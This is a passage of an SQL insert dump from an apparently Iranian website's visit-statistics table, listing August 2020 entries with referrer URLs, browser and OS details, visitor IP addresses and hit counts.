(3992,'2020-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.80.147','000',0,1,0),
(3993,'2020-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.60.210.97','000',0,1,0),
(3994,'2020-08-01','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','111.206.250.230','000',0,1,0),
(3995,'2020-08-01','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','111.206.250.198','000',0,1,0),
(3996,'2020-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.139.125','000',0,1,0),
(3997,'2020-08-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','128.199.223.220','000',0,1,0),
(3998,'2020-08-01','http://ictbank.ir/blog','Safari','OS X','10.13.2',NULL,NULL,'','108.62.94.98','000',0,1,0),
(3999,'2020-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.208.9.179','000',0,2,0),
(4000,'2020-08-01','http://ictbank.ir/blog','Safari','iOS','11.0.1',NULL,NULL,'','108.62.94.137','000',0,1,0),
(4001,'2020-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.154.67','000',0,1,0),
(4002,'2020-08-01','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=8347.epuHsOtFk5ln14eGvv3aVJFyF-sTXsas-gmzJhyvoiE.85a014aa7db51b83cbfdcdd93df2dcdceb3739da&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxdG5OOGdyY1p3VV93b2F4SHhMTmd6aDA1QVdEZWdOM1ZmamJTelVrbEctUmNPV01pajFBWV9KRDN4bkJJWU8wVlFGQXJ1TWRmZURC&b64e=2&sign=91cf51526483113129992f4f6e0e8e56&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfJbOde7BQYE15k0CiVqKoUbVqnl6rmPWn7JqZwCKkP58eN5mcWQ6tICxCw9l1Qm26Xn3sPSYjn7609wJPaIFtV5iGeZokSbtPbq0hQNsvToMwxN0oNXFBzQ8du7u5vkXz&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVLVIUOk4qiEN_VY-rEMcoX9jUDpld05Cq969rM6kqEDDGvLVhGAR1hgqH9vDvZJWTSgcKwbHZNLg&l10n=ru&cts=1596301641943&mc=6.31567196765','Yandex Browser','Windows','10.0',NULL,NULL,'','79.164.159.211','000',0,1,0),
(4003,'2020-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.111.237','000',0,1,0),
(4004,'2020-08-01','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','157.245.90.36','000',0,1,0),
(4005,'2020-08-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(4006,'2020-08-01','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','125.124.63.19','000',0,2,0),
(4007,'2020-08-01','http://ictbank.ir/blog','Safari','OS X','10.13.2',NULL,NULL,'','108.62.95.33','000',0,1,0),
(4008,'2020-08-02','http://ictbank.ir/blog','Safari','iOS','11.0.1',NULL,NULL,'','173.208.9.179','000',0,1,0),
(4009,'2020-08-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,7,0),
(4010,'2020-08-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(4011,'2020-08-02','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','182.92.81.28','000',0,2,0),
(4012,'2020-08-02','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','223.166.74.51','000',0,1,0),
(4013,'2020-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.28.4.190','000',0,1,0),
(4014,'2020-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.124.234.12','000',0,1,0),
(4015,'2020-08-02','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','181.214.187.192','000',0,1,0),
(4016,'2020-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.66.35','000',0,1,0),
(4017,'2020-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.51','000',0,2,0),
(4018,'2020-08-02','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4019,'2020-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.4.33','000',0,1,0),
(4020,'2020-08-02','http://ictbank.ir/blog','Safari','iOS','11.0',NULL,NULL,'','95.216.15.49','000',0,1,0),
(4021,'2020-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.240.175','000',0,1,0),
(4022,'2020-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.52.131.41','000',0,2,0),
(4023,'2020-08-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4024,'2020-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(4025,'2020-08-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,5,0),
(4026,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.5','000',0,1,0),
(4027,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.225.228.54','000',0,1,0),
(4028,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.201','000',0,1,0),
(4029,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.23','000',0,1,0),
(4030,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.170.40.180','000',0,1,0),
(4031,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','115.68.182.136','000',0,1,0),
(4032,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.226','000',0,1,0),
(4033,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.17.182.118','000',0,1,0),
(4034,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','14.247.50.184','000',0,1,0),
(4035,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.24','000',0,1,0),
(4036,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.46.7.194','000',0,1,0),
(4037,'2020-08-03','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','191.101.95.10','000',0,3,0),
(4038,'2020-08-03','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','207.180.255.81','000',0,1,0),
(4039,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.221.144','000',0,1,0),
(4040,'2020-08-03','http://ictbank.ir/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','111.92.31.111','000',0,1,0),
(4041,'2020-08-03','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','54.242.0.16','000',0,1,0),
(4042,'2020-08-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','110.39.188.66','000',0,1,0),
(4043,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.169.100','000',0,1,0),
(4044,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.205.39.172','000',0,1,0),
(4045,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.36','000',0,1,0),
(4046,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','43.241.57.18','000',0,1,0),
(4047,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.62.103.239','000',0,1,0),
(4048,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.30','000',0,1,0),
(4049,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.20.228.203','000',0,1,0),
(4050,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.34.61.219','000',0,1,0),
(4051,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','96.29.174.5','000',0,1,0),
(4052,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.26','000',0,1,0),
(4053,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.85.168.110','000',0,1,0),
(4054,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.249.226.67','000',0,1,0),
(4055,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(4056,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.150','000',0,1,0),
(4057,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.189.195','000',0,1,0),
(4058,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.198.50.113','000',0,1,0),
(4059,'2020-08-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','212.69.24.209','000',0,1,0),
(4060,'2020-08-03','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','143.215.247.109','000',0,1,0),
(4061,'2020-08-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.214.89.208','000',0,1,0),
(4062,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.113.111.80','000',0,2,0),
(4063,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.218.2','000',0,1,0),
(4064,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.238.206','000',0,1,0),
(4065,'2020-08-03','http://ictbank.ir/blog','Safari','OS X','10.13.2',NULL,NULL,'','173.208.9.179','000',0,2,0),
(4066,'2020-08-03','http://design-arena.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','154.16.56.222','000',0,2,0),
(4067,'2020-08-03','http://ictbank.ir/blog','Safari','iOS','11.0.1',NULL,NULL,'','108.62.95.33','000',0,1,0),
(4068,'2020-08-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4069,'2020-08-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4070,'2020-08-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.66.26','000',0,1,0),
(4071,'2020-08-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(4072,'2020-08-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.70.114','000',0,1,0),
(4073,'2020-08-03','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','46.4.33.48','000',0,1,0),
(4074,'2020-08-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4075,'2020-08-04','http://design-arena.ir/','Edge','OS X','10.47.00',NULL,NULL,'','213.231.29.84','000',0,1,0),
(4076,'2020-08-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.25','000',0,1,0),
(4077,'2020-08-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.150.88.173','000',0,1,0),
(4078,'2020-08-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.155.87','000',0,1,0),
(4079,'2020-08-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','162.217.144.148','000',0,2,0),
(4080,'2020-08-04','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','185.143.172.80','000',0,6,0),
(4081,'2020-08-04','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','23.227.115.35','000',0,1,0),
(4082,'2020-08-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.153.242','000',0,1,0),
(4083,'2020-08-04','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.191.204.4','000',0,1,0),
(4084,'2020-08-04','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','143.215.247.109','000',0,1,0),
(4085,'2020-08-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.43.32','000',0,1,0),
(4086,'2020-08-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(4087,'2020-08-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,1,0),
(4088,'2020-08-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.183.131','000',0,1,0),
(4089,'2020-08-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4090,'2020-08-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(4091,'2020-08-04','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','46.4.33.48','000',0,1,0),
(4092,'2020-08-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(4093,'2020-08-05','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','159.65.24.22','000',0,7,0),
(4094,'2020-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','148.72.86.182','000',0,2,0),
(4095,'2020-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.3.151','000',0,1,0),
(4096,'2020-08-05','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(4097,'2020-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.104.217','000',0,1,0),
(4098,'2020-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.161.113','000',0,1,0),
(4099,'2020-08-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','173.255.227.220','000',0,1,0),
(4100,'2020-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.175.245','000',0,1,0),
(4101,'2020-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.202.204.118','000',0,1,0),
(4102,'2020-08-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4103,'2020-08-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4104,'2020-08-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(4105,'2020-08-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','96.30.196.183','000',0,1,0),
(4106,'2020-08-05','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.140','000',0,2,0),
(4107,'2020-08-05','http://design-arena.ir/','Chrome','Windows','10.0',NULL,NULL,'','51.158.117.251','000',0,1,0),
(4108,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.107.92','000',0,1,0),
(4109,'2020-08-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,5,0),
(4110,'2020-08-06','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(4111,'2020-08-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,1,0),
(4112,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.57','000',0,1,0),
(4113,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.170.40.180','000',0,1,0),
(4114,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.191','000',0,1,0),
(4115,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.176.241','000',0,1,0),
(4116,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.80','000',0,1,0),
(4117,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.38.227.167','000',0,1,0),
(4118,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.147.244.86','000',0,1,0),
(4119,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','43.229.77.90','000',0,1,0),
(4120,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.187.144.85','000',0,1,0),
(4121,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,2,0),
(4122,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.6','000',0,1,0),
(4123,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.105.69','000',0,1,0),
(4124,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.26','000',0,1,0),
(4125,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.25','000',0,1,0),
(4126,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.30.238.187','000',0,1,0),
(4127,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.70.116.16','000',0,1,0),
(4128,'2020-08-06','http://www.ictbank.ir/','Chrome','Windows','10.0',NULL,NULL,'','163.172.152.212','000',0,1,0),
(4129,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.104.229','000',0,1,0),
(4130,'2020-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.152.9','000',0,1,0),
(4131,'2020-08-06','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','180.76.140.59','000',0,2,0),
(4132,'2020-08-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.226','000',0,1,0),
(4133,'2020-08-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(4134,'2020-08-06','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4135,'2020-08-06','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','85.234.37.114','000',0,1,0),
(4136,'2020-08-06','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','134.122.96.143','000',0,1,0),
(4137,'2020-08-06','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(4138,'2020-08-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4139,'2020-08-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.204.118','000',0,1,0),
(4140,'2020-08-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','77.247.109.114','000',0,1,0),
(4141,'2020-08-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4142,'2020-08-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.218.75.234','000',0,1,0),
(4143,'2020-08-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','46.17.104.33','000',0,1,0),
(4144,'2020-08-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','39.101.150.29','000',0,1,0),
(4145,'2020-08-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(4146,'2020-08-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.252.68','000',0,1,0),
(4147,'2020-08-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.99.216.112','000',0,1,0),
(4148,'2020-08-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.145.14','000',0,1,0),
(4149,'2020-08-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.71','000',0,1,0),
(4150,'2020-08-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.38.106.72','000',0,1,0),
(4151,'2020-08-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4152,'2020-08-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(4153,'2020-08-07','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','164.132.44.97','000',0,1,0),
(4154,'2020-08-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.77.202','000',0,1,0),
(4155,'2020-08-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(4156,'2020-08-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.26.219','000',0,1,0),
(4157,'2020-08-08','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','37.194.188.26','000',0,1,0),
(4158,'2020-08-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.203.119','000',0,1,0),
(4159,'2020-08-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.144.242','000',0,1,0),
(4160,'2020-08-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.148.121.143','000',0,1,0),
(4161,'2020-08-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4162,'2020-08-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','134.96.235.27','000',0,1,0),
(4163,'2020-08-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','93.174.95.106','000',0,1,0),
(4164,'2020-08-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(4165,'2020-08-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','20.44.106.111','000',0,2,0),
(4166,'2020-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.250.65','000',0,1,0),
(4167,'2020-08-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4168,'2020-08-09','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','69.39.239.21','000',0,1,0),
(4169,'2020-08-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(4170,'2020-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.56.82','000',0,1,0),
(4171,'2020-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.157.184','000',0,1,0),
(4172,'2020-08-09','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','94.242.26.158','000',0,1,0),
(4173,'2020-08-09','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','2.56.16.82','000',0,1,0),
(4174,'2020-08-09','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.232.138.209','000',0,2,0),
(4175,'2020-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.59.215','000',0,1,0),
(4176,'2020-08-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','72.210.252.148','000',0,1,0),
(4177,'2020-08-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.205.12.64','000',0,1,0),
(4178,'2020-08-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(4179,'2020-08-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4180,'2020-08-09','http://design-arena.ir/blog','Baidu Browser','Windows','6.1',NULL,NULL,'','5.157.52.152','000',0,1,0),
(4181,'2020-08-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.157.22.180','000',0,1,0),
(4182,'2020-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','173.252.87.13','000',0,1,0),
(4183,'2020-08-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.57.32','000',0,1,0),
(4184,'2020-08-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.47.55','000',0,1,0),
(4185,'2020-08-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,8,0),
(4186,'2020-08-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.211.14','000',0,1,0),
(4187,'2020-08-10','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','162.213.37.137','000',0,1,0),
(4188,'2020-08-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(4189,'2020-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4190,'2020-08-10','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4191,'2020-08-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4192,'2020-08-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,9,0),
(4193,'2020-08-11','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','168.151.123.93','000',0,1,0),
(4194,'2020-08-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.100.87.250','000',0,1,0),
(4195,'2020-08-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.232.218','000',0,1,0),
(4196,'2020-08-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.195.24.186','000',0,1,0),
(4197,'2020-08-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.12.233','000',0,1,0),
(4198,'2020-08-11','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','95.181.172.31','000',0,1,0),
(4199,'2020-08-11','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(4200,'2020-08-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,1,0),
(4201,'2020-08-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.234.150','000',0,1,0),
(4202,'2020-08-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(4203,'2020-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.154','000',0,1,0),
(4204,'2020-08-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.177.29','000',0,1,0),
(4205,'2020-08-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.219.111','000',0,1,0),
(4206,'2020-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.138','000',0,1,0),
(4207,'2020-08-11','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','81.19.210.178','000',0,3,0),
(4208,'2020-08-11','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','95.181.152.129','000',0,1,0),
(4209,'2020-08-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4210,'2020-08-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
